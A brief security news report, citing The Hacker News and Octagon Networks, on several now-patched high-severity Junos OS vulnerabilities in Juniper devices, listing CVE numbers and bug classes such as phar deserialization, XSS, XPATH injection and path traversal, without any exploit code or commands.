Juniper Networks devices are being affected with numerous high-severity vulnerabilities involving the Junos OS, The Hacker News reports.
Some of the flaws including a remote pre-authenticated PHP archive file deserialization bug within Junos OS's J-Web component, tracked as CVE-2022-22241, could be leveraged to facilitate remote code execution, according to a report from Octagon Networks.
"This vulnerability can be exploited by an unauthenticated remote attacker to get remote phar files deserialized, leading to arbitrary file write, which leads to a remote code execution (RCE)," said Octagon Networks researcher Paulos Yibelo.
Malicious actors could also exploit a pre-authenticated reflected error page XSS bug, tracked as CVE-2022-22242, to exfiltrate Junos OS admin sessions, while XPATH injection flaws, tracked as CVE-2022-22243 and CVE-2022-22244, could be used for Junos OS admin session theft and manipulation.
Other flaws identified include a path traversal vulnerability, tracked as CVE-2022-22245, and a local file inclusion bug, tracked as CVE-2022-22246.
Juniper Networks has already addressed the flaws in newer releases of the Junos OS.